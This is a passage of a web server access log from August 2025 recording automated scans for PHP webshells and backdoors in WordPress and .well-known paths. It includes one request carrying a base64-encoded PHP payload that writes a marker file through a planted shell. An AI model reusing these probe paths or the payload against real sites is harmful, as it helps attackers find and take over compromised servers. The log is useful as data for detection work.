301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:20:20:16 -0400] "GET /wp-content/plugins/core/include.php HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:20:21:03 -0400] "GET /ws.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:20:21:49 -0400] "GET /wp-content/plugins/wp-help/index.php HTTP/1.1" 301 271 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:20:22:18 -0400] "GET /wp-content/plugins/index.php HTTP/1.1" 301 263 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:20:23:26 -0400] "GET /wp-config-sample.php HTTP/1.1" 301 255 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:20:23:34 -0400] "GET /wp-content/pm.php HTTP/1.1" 301 252 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 152.42.157.60 - - [12/Aug/2025:20:23:43 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.89.216.7 - - [12/Aug/2025:20:23:43 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 174.138.112.39 - - [12/Aug/2025:20:23:43 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 170.64.252.169 - - [12/Aug/2025:20:23:44 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:20:24:56 -0400] "GET /.well-known/about.php HTTP/1.1" 301 256 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:20:25:53 -0400] "GET /wp-content/themes/travel/issue.php HTTP/1.1" 301 269 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:20:26:49 -0400] "GET /worm0.PhP7 HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 86.8.204.43 - - [12/Aug/2025:20:28:46 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:20:28:47 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:20:28:47 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:20:28:47 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:20:28:49 -0400] "GET /wp-content/updraft/themes.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:20:28:50 -0400] "GET /alfanew.PhP7 HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 209.38.125.40 - - [12/Aug/2025:20:30:06 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 144.126.240.247 - - [12/Aug/2025:20:30:06 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.203.144 - - [12/Aug/2025:20:30:06 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.190.67 - - [12/Aug/2025:20:30:06 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 94.16.113.252 - - [12/Aug/2025:20:30:07 -0400] "GET /gawean.PhP7 HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:20:31:11 -0400] "GET /404.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:20:32:23 -0400] "GET /wp.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:20:33:18 -0400] "GET /wp-head.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 209.38.125.40 - - [12/Aug/2025:20:33:58 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:20:33:58 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.50.215.205 - - [12/Aug/2025:20:33:58 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:20:33:59 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:20:35:13 -0400] "GET /wp-includes/wp-class.php HTTP/1.1" 301 259 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:20:37:13 -0400] "GET /fm1.php HTTP/1.1" 301 242 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 146.190.11.185 - - [12/Aug/2025:20:37:29 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:20:37:29 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 164.90.241.135 - - [12/Aug/2025:20:37:29 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.203.144.167 - - [12/Aug/2025:20:37:29 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:20:38:02 -0400] "GET /wp-content/themes/intense/block-css.php?mode=upload HTTP/1.1" 301 286 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:20:39:11 -0400] "GET /alfadheat.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:20:40:32 -0400] "GET /M1.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:20:40:58 -0400] "GET /wp-content/themes/hideo/network.php HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:20:41:07 -0400] "GET /admin.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:20:41:30 -0400] "GET /wp-admin/images/admin.php HTTP/1.1" 301 260 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 86.8.204.43 - - [12/Aug/2025:20:43:54 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:20:43:54 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:20:43:54 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:20:43:54 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:20:44:24 -0400] "GET /about.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:20:45:10 -0400] "GET /wp-info.php HTTP/1.1" 301 246 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:20:45:12 -0400] "GET /alfanew.php7 HTTP/1.1" 301 247 "-" "python-requests/2.27.1" 94.16.113.252 - - [12/Aug/2025:20:45:35 -0400] "GET /dropdown.php HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:20:46:34 -0400] "GET /wp-admin/dropdown.php HTTP/1.1" 301 256 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:20:48:09 -0400] "GET /wp-includes/IXR/themes.php HTTP/1.1" 301 261 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:20:48:57 -0400] "GET /wp-content/plugins/core/include.php HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:20:49:24 -0400] "GET /wp-admin/css/colors/blue/blue.php?wall=ZWNobyAnQmxhY2sgQm90Jztmd3JpdGUoZm9wZW4oJ2Jsa29zY3FqLnBocCcsJ3crJyksJzw/cGhwIGVjaG8gIkJsYWNrIEJvdCI7Pz4nKTs= HTTP/1.1" 301 382 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:20:49:28 -0400] "GET /simple.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:20:49:32 -0400] "GET /class.api.php HTTP/1.1" 301 248 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 209.38.125.40 - - [12/Aug/2025:20:49:45 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:20:49:46 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.50.215.205 - - [12/Aug/2025:20:49:46 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:20:49:46 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:20:49:48 -0400] "GET /autoload_classmap.php HTTP/1.1" 301 256 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:20:51:10 -0400] "GET /wp-head.php HTTP/1.1" 301 246 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:20:51:47 -0400] "GET /wp-includes/ID3/wp-login.php HTTP/1.1" 301 263 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:20:53:47 -0400] "GET /wp-includes/SimplePie/plugins.php HTTP/1.1" 301 268 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:20:54:19 -0400] "GET /wp-content/themes/travelscape/json.php HTTP/1.1" 301 273 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:20:54:20 -0400] "GET /wp-content/themes/aahana/json.php HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:20:54:21 -0400] "GET /xleet.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 152.42.157.60 - - [12/Aug/2025:20:54:22 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.89.216.7 - - [12/Aug/2025:20:54:22 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 174.138.112.39 - - [12/Aug/2025:20:54:22 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 170.64.252.169 - - [12/Aug/2025:20:54:22 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:20:54:30 -0400] "GET /wp-content/themes/twenty/twenty.php HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:20:54:36 -0400] "GET /wp-content/plugins/alfa-rex.php HTTP/1.1" 301 266 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:20:55:35 -0400] "GET /wp-content/plugins/about.php HTTP/1.1" 301 263 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:20:56:22 -0400] "GET /xl2023.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:51 -0400] "GET /.well-known/acme-challenge/about.php HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:51 -0400] "GET /_.php HTTP/1.1" 301 236 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:51 -0400] "GET /.tmb/wso.php HTTP/1.1" 301 243 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:51 -0400] "GET /.well-known/acme-challenge/index.php HTTP/1.1" 301 267 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:52 -0400] "GET /?loadme HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:52 -0400] "GET /.well-known/acme-challenge/xmrlpc.php?p= HTTP/1.1" 301 271 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:52 -0400] "GET /.well-known/acme-challenge/inputs.php HTTP/1.1" 301 268 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:52 -0400] "GET /.well-known/index.php HTTP/1.1" 301 252 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:52 -0400] "GET /.well-known/content.php HTTP/1.1" 301 254 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:52 -0400] "GET /.well-known/gelay.php HTTP/1.1" 301 252 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:53 -0400] "GET /.well-known/wp-signup.php HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:53 -0400] "GET /.well-known/pki-validation/xmrlpc.php?p= HTTP/1.1" 404 - "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:53 -0400] "GET /.well-knownold/index.php HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:53 -0400] "GET /.wp-cache.php HTTP/1.1" 301 244 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:53 -0400] "GET /.well-known/pki-validation/index.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:53 -0400] "GET /00.php HTTP/1.1" 301 237 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:53 -0400] "GET /0.php HTTP/1.1" 301 236 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:53 -0400] "GET /0byte.php HTTP/1.1" 301 240 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:53 -0400] "GET /01.php HTTP/1.1" 301 237 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:53 -0400] "GET /1.php HTTP/1.1" 301 236 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:54 -0400] "GET /100.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:54 -0400] "GET /123.php HTTP/1.1" 301 238 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:54 -0400] "GET /10.php HTTP/1.1" 301 237 "-" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Mobile Safari/537.36" 136.228.146.29 - - [12/Aug/2025:20:56:54 -0400] "GET /2.php HTTP/1.1" 301 236 "-" "Mozilla/5.0 (Linux; Android 10; K) 